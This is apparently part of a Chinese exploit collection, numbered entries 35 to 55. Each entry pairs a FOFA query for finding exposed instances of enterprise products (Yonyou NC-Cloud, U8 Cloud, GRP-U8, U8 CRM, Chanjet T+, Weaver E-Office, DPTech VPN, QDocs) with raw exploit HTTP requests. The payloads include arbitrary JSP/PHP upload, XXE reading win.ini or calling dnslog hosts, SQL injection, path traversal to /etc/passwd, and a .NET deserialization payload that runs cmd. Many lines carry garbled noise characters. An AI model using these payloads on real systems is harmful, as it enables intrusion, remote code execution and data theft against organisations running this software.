/ V7 g. u) L; u) p) D35. 用友NC-Cloud importhttpscer任意文件上传9 A8 M" Z' u+ c8 T6 ^0 o
FOFA:app="用友-NC-Cloud"
' ]6 G6 M# o% IPOST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1
% H. D2 l1 x1 u+ E5 g4 P1 {( x& V9 nHost: 203.25.218.166:8888
2 U+ `" D. @9 B- j7 r9 V0 `User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info4 p! E8 y- E4 |9 K$ W" G
Accept-Encoding: gzip, deflate! _0 G( Q! }$ w2 o6 g0 u: K
Accept: */*
6 a# Y0 P2 ~1 d$ a! M3 h4 h) JConnection: close! J8 h+ c; o$ k. V1 N
accessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA
4 Z' F1 s* F- m5 g' F3 X/ o( CContent-Length: 190+ \ m) ^* I6 [
Content-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0% E, x* B+ V% a9 W; u& O9 I
4 f- `9 y4 c9 E1 d! H--fd28cb44e829ed1c197ec3bc71748df04 Z, [' Q9 R; B, M' @4 ?
Content-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp" T: N2 J& W: L, w7 X- K
1 F7 g5 w* ]" p" _9 O- K, T. z2 f2 q<%out.println(1111*1111);%>
5 q4 G3 F H6 J3 ]) [--fd28cb44e829ed1c197ec3bc71748df0--0 B$ |: a; x8 x" v3 v
+ f' E" k) Y* t+ `, W# t
6 V* q. O. O$ Y6 Y4 l7 j9 {$ r8 h7 c
36. 用友NC-Cloud soapFormat XXE3 z; N! J f7 N' ~
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/": \! S# D. ]8 c' H5 Z" S
POST /uapws/soapFormat.ajax HTTP/1.1$ q! B& I. \: ]1 Y
Host: 192.168.40.130:8989
; V( T) U( q9 v$ TUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
7 T8 a6 ?' c1 o& w& X* o* `Content-Length: 263. q, S, o6 q' U8 G
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.89 T; C9 C+ F2 K/ e4 U" L7 |/ C
Accept-Encoding: gzip, deflate& n; F( B8 P7 x* I; s
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.22 A! K+ c6 F8 i, K! B4 i
Connection: close/ m' C) Q% p' {- t
Content-Type: application/x-www-form-urlencoded! Q1 Z0 V; c2 g2 u
Upgrade-Insecure-Requests: 1
8 t! I6 y- a2 W7 `; J, k5 w( Z' V
# C( u' ?! B9 xmsg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a
' [- f* S1 ~3 ]) F& Y$ C* U. r/ b' [7 D; L6 f% {% R% _: @8 z
+ @2 b2 l) r, J7 L37. 用友NC-Cloud IUpdateService XXE, D- @$ _6 C v) Z
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
4 S2 o5 U- y0 QPOST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1% H/ V5 d! r9 y5 z1 {% e3 R
Host: 192.168.40.130:8989! {2 y! i/ d* n) B* _! Z
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36; ]: ?: e3 B9 T; ~
Content-Length: 421* J" N9 S3 E% I
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
8 u: u3 |& W5 P7 F$ X! eAccept-Encoding: gzip, deflate6 _& g# ?4 F! g# y; n
Accept-Language: zh-CN,zh;q=0.97 }5 v- n$ F6 {6 E' \
Connection: close* F; A4 x$ [7 H& z9 \4 p
Content-Type: text/xml;charset=UTF-8
- Z" \7 A6 B+ W5 i; } j! {SOAPAction: urn:getResult
$ v B! t$ [! T+ iUpgrade-Insecure-Requests: 1
: F# j; m5 _/ N( z% d* @4 x, x/ l
& m3 Y" O+ {* I* A" y' h( v K, x<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">
& u W- M4 L( B<soapenv:Header/>
. `1 V$ D& Y. D+ Q5 E0 N<soapenv:Body>" A8 J4 S* `2 m5 _+ S5 B# {6 a7 W1 X
<iup:getResult>
7 E! ]$ {/ W/ w3 E; F3 P& w- R: y) Z<!--type: string-->8 B) r) N \' q. A2 q; h
<iup:string><![CDATA[
6 N+ u7 w3 `- K: |. p/ `<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>/ }) u. [) Y- y1 ^# ]/ R% c. A9 H
<xxx/>]]></iup:string>
. @/ C: T: m; z6 Q: {</iup:getResult>
' B& }/ d, U7 A</soapenv:Body>
; ~1 u9 N7 Q6 K7 g</soapenv:Envelope>
1 h$ Y4 L: j0 R. f1 _, B2 K8 c+ R9 b& m+ B
; e. U$ o6 j6 U+ `; V1 K1 d, V
" ]$ u3 O6 L7 b$ I# R/ J5 o# i38. 用友U8 Cloud smartweb2.RPC.d XXE
9 G* u% g- N( a; V" NFOFA:app="用友-U8-Cloud"( J9 C. p, w5 U4 W6 x! \" V1 f
POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1
8 d T: T) O9 I) a/ m9 t, ]6 \7 XHost: 192.168.40.131:8088
, t' e" B6 i. m3 A c; [User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25
6 ^8 }6 m: u' f+ ~! tContent-Length: 260
' o4 c j7 I3 aAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
( l" X* v* V3 n4 hAccept-Encoding: gzip, deflate, E, t8 Z" \! Q4 s
Accept-Language: zh-CN,zh;q=0.9
$ T. y1 v1 v9 W& b) I3 t# J# e( gConnection: close
3 v- b/ H% f S$ L! XContent-Type: application/x-www-form-urlencoded
, p7 X% U- @& Y/ t. x. u8 w
( I- ?' J3 T' g% w2 @& c- f3 ^__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>/ b$ \. h# D. A0 ]& s$ R
' {( [) e; _: P8 U& G
. }+ {2 N% E, ]$ K& R$ N; E
39. 用友U8 Cloud RegisterServlet SQL注入
# ?' W% ~# U8 n' U. iFOFA:title="u8c"! @/ c/ O7 @$ Y; e7 ?
POST /servlet/RegisterServlet HTTP/1.1: x6 n3 s" a# v) c: b6 ~) P' p( f
Host: 192.168.86.128:80891 @. I' R( @( O5 Q M7 H2 m( V
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36) T" w6 {5 _% `1 [0 b( X7 z
Connection: close3 c) y; b( J. H
Content-Length: 85
: t0 H% E/ N/ w2 C; ^2 y+ `1 z3 N7 xAccept: */*
* h/ M& ~& N1 q# M/ V8 C* Z+ v1 ~Accept-Language: en2 m! `! |. d& d# m! O7 C; r
Content-Type: application/x-www-form-urlencoded
& M2 r; f6 l! g& B' o6 SX-Forwarded-For: 127.0.0.1
8 ^) _ M3 G* a" XAccept-Encoding: gzip' U& B4 \/ ~( N" p$ F, B
9 u) q. J: Z$ `
usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--- ~0 f- A* w! i; R ^/ N2 }
W) {9 |: z! ?5 e, a9 I X2 V( Z' \' y; S* u) |0 F/ n
40. 用友U8-Cloud XChangeServlet XXE4 S1 Z6 ?! a- k2 F
FOFA:app="用友-U8-Cloud"# n: V$ D& P, `
POST /service/XChangeServlet HTTP/1.1- t% h7 T) p7 A: f
Host: x.x.x.x
" d h, r* P9 m# WUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
d9 ?4 f7 K* _: E" MContent-Type: text/xml
- m% K9 A1 }9 v1 Q) c+ TConnection: close" a5 _3 v6 s' X& ?% J9 ?
0 D% }! x2 [- N/ V
<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>- v0 b/ s7 n& m+ Y
' B- v/ e$ w. W8 R |9 h' h7 F
7 q4 B3 X# W) i- h41. 用友U8 Cloud MeasureQueryByToolAction SQL注入
9 S! i6 X& Y2 L3 W% i$ N; k4 D* DFOFA:app="用友-U8-Cloud", r0 a7 e$ |* h% W6 C, A6 {
GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1
$ F' W0 C7 @. Y- @1 P/ GHost:% b! O6 o/ C# @1 b' T0 D. r
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
6 o+ i7 F7 C' c/ k; ?Content-Type: application/json) P+ M5 b- _: Q" T" F8 U
Accept-Encoding: gzip6 W6 |0 U' N& _$ x5 Z
Connection: close! S. V. ?$ i! R' m- {
# N( K2 f" d. b \8 F0 \ F
- w6 s( y6 e4 Z8 a5 }) S, m) T! O7 F
42. 用友GRP-U8 SmartUpload01 文件上传8 l' A3 q9 }' V! m; C+ G% X
FOFA:app="用友-GRP-U8"5 n+ S" C v( R, r" _
POST /u8qx/SmartUpload01.jsp HTTP/1.1
+ w1 \9 j, a3 X. i( WHost: x.x.x.x% J; m. l" m4 z, c( v s( P0 i) m
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt
7 y! a% |: k5 t8 k7 U E1 TUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36
, \5 d4 O5 u) t. f9 V' Q2 [9 M7 o( v' G" z
PAYLOAD' m! v& [4 q1 T: [, ~0 V' a; f
0 ?; \; r" P+ P0 Z7 n* {) A& V+ B" e! f
+ p6 W$ [( F) \http://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml
I2 [' D3 l% m( z5 G2 j u3 a
. d! f: y$ D0 y; n( R+ k+ F2 _& u( _43. 用友GRP-U8 userInfoWeb SQL注入致RCE
9 D4 a, L _% E9 y+ J7 u3 oFOFA:app="用友-GRP-U8"3 x8 Y6 K1 ` j& S
POST /services/userInfoWeb HTTP/1.1
- T& x# A) V& T, D# ?. [$ X" {Host: your-ip
U: ^1 W% g3 y% Q% ~$ }2 y: A9 WUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
- G# |: {9 u, i/ y, NAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
4 S! E1 Y+ W% }Accept-Encoding: gzip, deflate
a. @9 z& @3 [' S5 G0 }Accept-Language: zh-CN,zh;q=0.9( V8 }" D4 ^; ]+ k: z
Connection: close+ f8 M1 o# W5 o! A
SOAPAction:" R5 g3 W# K( I
Content-Type: text/xml;charset=UTF-8
) O% X% d1 [' j
7 I) {! V! f1 E+ v3 T+ I; |4 E. O( C<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">
- W, }- d# p& L, }; P: b" m. W. e <soapenv:Header/>& f8 Q5 F3 l# B8 K
<soapenv:Body>9 W# r% x0 A6 _
<ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
/ j0 }" ^8 q5 p! [$ s' g& A( k <userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>& F3 Q+ s1 b r% g' B, P
</ser:getUserNameById>
3 f1 c9 G3 s; h) l; v </soapenv:Body>
' G- L7 s: V, L- f! H</soapenv:Envelope>) L# a4 L; U' d' f: t
! ^5 d( x" n* m M
0 j9 N- `( T6 y6 V. E8 W
44. 用友GRP-U8 bx_dj_check.jsp SQL注入
J9 q l, v' ~FOFA:app="用友-GRP-U8"% G( f6 q( _' t. \4 `" f
GET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.12 g4 _, T% N& C Y( ^
Host: your-ip
$ _% s. q3 L6 M5 ?User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
/ Y+ H" g: }' a4 l/ f% L) sAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
1 H; T# {$ e; C& }8 CAccept-Encoding: gzip, deflate$ J1 i- ] ~4 d& |4 M6 _ i
Accept-Language: zh-CN,zh;q=0.9
" K" O$ f' t! g) n/ \Connection: close+ W3 G$ s$ e+ D# D& Y9 }
+ P2 E8 C( `9 {5 m: V7 r
* q. H/ f8 {, B* T5 h7 i5 ]45. 用友GRP-U8 ufgovbank XXE( @8 I3 R) G2 i8 K
FOFA:app="用友-GRP-U8". i/ K2 C1 v. Z
POST /ufgovbank HTTP/1.1
8 b& Z+ i% d; `& ^ G1 KHost: 192.168.40.130:222$ _; L& q8 ]# ]' T& G
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.04 I3 Q) w4 u) w% @9 v7 E( N
Connection: close8 U- w, W, T, g5 M" E$ L3 o
Content-Length: 161
1 b$ I( @4 G1 ~/ aAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
, [! o; q7 Q" B3 ]( ^9 YAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
8 x& z2 I B, I/ J$ g7 z7 }1 uContent-Type: application/x-www-form-urlencoded( D1 M" M' E8 k
Accept-Encoding: gzip
/ P" E% h7 p G; s9 R4 R* |0 T' ~$ F8 P
reqData=<?xml version="1.0"?>
; T! {* C7 C) o% T9 N<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest
! F' T7 ~1 i2 ?0 Z9 s' l' ]* M6 T! s
# U! L2 T- F7 S. F* k4 J
) b$ y7 w( R4 [- k6 }4 n46. 用友GRP-U8 sqcxIndex.jsp SQL注入
( y, o9 ?. V U: v! TFOFA:app="用友-GRP-U8"
: k# E i. m% A. D# Q8 k& ^, TGET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1
' f! ]$ ]$ X+ f( Q2 B4 ?7 ?% h. PHost: your-ip
( Z& P8 c9 Y/ N1 EUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36& B4 Z2 e9 O2 ^2 n R' j
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.71 ^3 J" O9 _2 p- W5 `( J' `( V/ L3 r
Accept-Encoding: gzip, deflate
( f1 V* K, {& C2 K# gAccept-Language: zh-CN,zh;q=0.9: _9 e+ |# i; w1 S( t `
Connection: close6 }" r# e0 Z$ m. d; x( j* o6 \
! P2 C9 a/ a" I$ Y* S$ W4 T
- j7 V5 A8 d9 D47. 用友GRP A++Cloud 政府财务云 任意文件读取
4 i/ l( f, `7 R8 j$ VFOFA:body="/pf/portal/login/css/fonts/style.css"
. O3 q# V8 {* ~) J0 u! fGET /ma/emp/maEmp/download?fileName=../../../etc/passwdHTTP/1.1' m$ ?$ h) d; Q9 t- g
Host: x.x.x.x
) g5 q0 `* D: v* I3 ?Cache-Control: max-age=0% P" A. v0 G% i6 L) I# e
Upgrade-Insecure-Requests: 1- o+ U0 H* `2 z# q2 @
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36; G! @5 m Y W3 b
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
/ v' _6 h) |( E( PAccept-Encoding: gzip, deflate, br
7 [0 X, r8 X7 W; o9 w6 l4 QAccept-Language: zh-CN,zh;q=0.92 i( ]" c; y# L0 I1 P
If-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT, f: j% @7 V, @# [; I V% x. d% x2 V
Connection: close
( \& q K2 i# p
/ m9 v$ a. w% V4 h" P
9 F7 h, x* w9 i, v, s. B7 u; c: g# f( v9 k( Q. M# G+ s+ V
48. 用友U8 CRM swfupload 任意文件上传
! f4 |! h' _! e$ q8 nFOFA:title="用友U8CRM"
. T( T! F E) C/ RPOST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1; X7 o! M8 t4 `2 o: W
Host: your-ip1 u) ~0 M7 a9 m5 R3 D
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
% h" i" _) @) f# c* @9 DAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8! G7 m+ E3 D, p3 E* @& F
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2. K4 \; `% R" m: n2 c5 v* G
Accept-Encoding: gzip, deflate
I0 m" y/ Q# b. f3 ]+ R; sContent-Type: multipart/form-data;boundary=----269520967239406871642430066855
. d: [* P* K6 v! z! ^) W0 W------269520967239406871642430066855
7 j) k; {* P8 b$ g3 Y4 \! rContent-Disposition: form-data; name="file"; filename="s.php"
! c0 [2 }. o9 D$ M1231
& ~7 {, x( V& o+ J; z7 T zContent-Type: application/octet-stream
# H* n' J2 n/ S6 j- \' M. i------2695209672394068716424300668557 h( f A% j2 \( p
Content-Disposition: form-data; name="upload") w7 M% D% O/ a {5 T. x, H& ^
upload
4 O$ B; t3 `( K* V3 |, R; _------269520967239406871642430066855--2 E! O4 g% E2 m4 T# i6 }2 R. K+ T3 k
+ p, Z8 k7 L, W- H# O& q6 v, e
! `- L) \8 |& T2 P4 L- f49. 用友U8 CRM系统uploadfile.php接口任意文件上传; u4 y: Q5 H: ]
FOFA:body="用友U8CRM"
; W' F8 ^. e' K. r5 s' ~! U: U
4 J5 ]$ a# V t; b% @7 k8 ?' H& G( Q* LPOST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1$ ]7 B) b' F3 ?+ [) B! v
Host: x.x.x.x B8 n& S5 X/ T8 Y7 J# H
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0- ]8 O0 P! r8 L" O6 o. @ ?. k
Content-Length: 3296 U+ o* w+ G4 D# S2 S
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
4 e! z+ Y: \+ S: n8 J) [: BAccept-Encoding: gzip, deflate
1 s! q# x+ T" e5 iAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2( Q0 H1 G1 v0 p1 m) \$ ^8 @
Connection: close
Z5 i% S/ ?! z6 h3 [+ XContent-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w
: A: h# L% J; K: h0 d# y
5 F) n4 Z1 i: H! J( Y# B-----------------------------vvv3wdayqv3yppdxvn3w
+ `* A/ G9 [& ~8 YContent-Disposition: form-data; name="file"; filename="%s.php "
; c% V' J$ s! g8 VContent-Type: application/octet-stream( B6 ^/ m0 s x* ~9 m1 ]- \
$ x9 ^( q% ?% r V1 Iwersqqmlumloqa& h2 {! [/ K( d* W9 j$ W3 C
-----------------------------vvv3wdayqv3yppdxvn3w
3 i3 G$ s" z$ u! oContent-Disposition: form-data; name="upload": z. x+ u% q% w% R) N6 y
) |- @9 z; v {
upload& u4 ^/ L" f+ E$ X$ C0 H. @) p
-----------------------------vvv3wdayqv3yppdxvn3w--" F) a+ }3 K1 }3 ~ T& |
D2 h* c% k- P8 b" P$ h% b# \" q l8 X) Q
http://x.x.x.x/tmpfile/updB3CB.tmp.php, k7 D' P. k b) \& w3 F( V+ {) m
, j, x/ M) ?" R% `* A50. QDocs Smart School 6.4.1 filterRecords SQL注入0 J: y4 U# D: r7 M3 R, d
FOFA:body="close closebtnmodal"
/ V0 A. p9 X+ xPOST /course/filterRecords/ HTTP/1.1
0 S, T& B6 |1 SHost: x.x.x.x
1 Y' [6 \) s( K n% \8 D% k0 m8 _User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
- x3 P! Q& X5 h, g( V0 x8 WConnection: close. G$ z4 V& V K
Content-Length: 224
" u% x1 j5 @( b& ]0 n4 f1 E6 F6 [Accept: */*
. s" e% x9 Q0 P- t4 f8 gAccept-Language: en
# \- n" \7 `7 m$ f7 R# S1 e- QContent-Type: application/x-www-form-urlencoded
- l# C. Z9 I0 I! gAccept-Encoding: gzip
5 Q. a2 ]9 [. L: H$ Z" e
I* x& Y) r! V% G; D" p+ ?0 I- rsearchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=11 `$ K* X( d9 J- m+ e8 |# g; e
' s+ ^. I5 j) X: G2 m: T* G: }" `5 p" O3 j2 x: V! k$ l0 e' c
51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入
+ y6 k" }* N6 ~% ~4 o7 H" O+ \+ \ yFOFA:app="云时空社会化商业ERP系统"7 W; A" Z0 h+ r6 B8 g1 d# V. z: i
GET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1- U$ _/ d- ^1 M3 c
Host: your-ip
- U( N" A0 E$ m7 fUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36! A6 [& L- k" f$ C/ z+ u$ n
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9$ ~# w. ~: ^/ v* Q1 h8 y. n; F
Accept-Encoding: gzip, deflate
( f( [" y2 }4 E1 {( S" c$ yAccept-Language: zh-CN,zh;q=0.9
V, H% n8 a" f1 ]# I. L) Y4 XConnection: close' s9 _- W, C2 p
& d- t6 e. L% d- a8 ^
! t" s9 @5 ^8 k/ v8 J& ?9 W, [! z9 v& C52. 泛微E-Office json_common.php sql注入
) ? N7 _% C; `5 O* c6 `FOFA:app="泛微-EOffice"* t2 R' _4 m) ^
POST /building/json_common.php HTTP/1.13 O; [& H( G: ?9 Z6 R: E% j2 J( C
Host: 192.168.86.128:80977 G- g" Q, X2 S: g b
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
* {, C/ q4 p+ r0 p9 \, l/ [Connection: close" q# b5 M8 ^, J# {
Content-Length: 87
! N4 A! i! A* F* h! bAccept: */*) _+ S0 K V- d# W" Z3 e7 ]0 e
Accept-Language: en
, M) }+ L, e) DContent-Type: application/x-www-form-urlencoded6 ]+ C+ C% I, a
Accept-Encoding: gzip2 _4 [7 R9 `+ R n D( C
/ k$ B, d' V7 htfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333
' P1 Z0 [: Q5 u& i6 ~: I; V* q+ f i+ d1 c3 C
/ u' m, t* W U+ T53. 迪普 DPTech VPN Service 任意文件上传5 R6 V; L, ^, _; o2 o0 Q2 V
FOFA:app="DPtech-SSLVPN"
6 q4 P h& |, [1 J' {. \+ H/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd( {& h( A+ X5 J( A; k
0 e" d" M+ G/ N% M
2 v' X" f' d# c/ B7 ]$ W
54. 畅捷通T+ getstorewarehousebystore 远程代码执行2 w3 H. ~& j+ l5 x( v$ H/ ~
FOFA:app="畅捷通-TPlus"9 y2 f3 d4 y) E" ?0 Q. G8 K' C
第一步,向目标发送数据包,执行命令,将指定字符串写入指定文件
, X* }) k( P7 ~* @2 }4 l"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
. b0 H+ G& U6 P/ _; b2 a' X3 t/ L2 @' |2 ]8 I4 ~ s) ?0 d/ I* u
7 S9 o* t7 Q3 s, h2 G3 W完整数据包
7 C/ b) N4 p" b! d$ SPOST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
% I, s- ~& l) F _* N6 @ LHost: x.x.x.x" X1 ` s( K& c/ V! Q' t
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F: c2 v$ C/ o( z$ L3 O s
Content-Length: 593, r! ~0 e5 m* ]6 V6 d. Q y
) O6 o, L% L4 j
{
# X" D% B5 \, e- j+ g, K$ f% a; d"storeID":{
( M& z" Q5 K9 C! `" D7 V( c. y "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",2 ~: e0 m% f' ]8 u. S7 M
"MethodName":"Start",
& r) s$ A* L% Q! i+ v, ]' N" P "ObjectInstance":{, ~3 h! N6 o; a$ Z: L
"__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",' t, y! } _& r) k2 I/ o4 T
"StartInfo":{ u* D$ O2 X4 o5 t% {& ?% U; S# u
"__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
. J9 z7 P; W! P( j. k- g8 x "FileName":"cmd",0 C+ t2 v) L3 F% u# s- ^% v% n
"Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"( e; B0 R3 ~# v5 S6 {$ n2 b4 F
}2 L# G& G. d! W0 j/ z
}. n5 P8 i* ~$ c- U# A z X& H9 ~
}
- m, b" w! N- w% H" {8 n$ @/ O9 L}
: E( M+ e* ^$ u- {3 E: o3 m/ V+ a$ w/ `, z5 |
1 n1 p3 e, y9 } Q; O
第二步,访问如下url. w4 r4 g: A! a& {0 e' K5 [6 H6 p1 @
/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt
. Y+ R) ^9 y6 L0 R; ?5 f( z/ \$ K1 r8 D
. N, A* T+ Z0 H. U: n/ Q55. 畅捷通T+ getdecallusers信息泄露
) G6 U/ ~& p( x7 b& D3 k- \* YFOFA:app="畅捷通-TPlus"
9 }7 e' Y& c2 Z: `6 s. R _; V第一步,通过
6 S1 Q8 ]$ s) e- B" C8 v/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword接口获取Cookie1 S$ L# M3 T% b7 v6 |
第二步,利用获取到的Cookie请求
. _/ Q9 X, M# v8 ?0 F: X/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers
U6 W* G- c9 Z# p1 K6 z
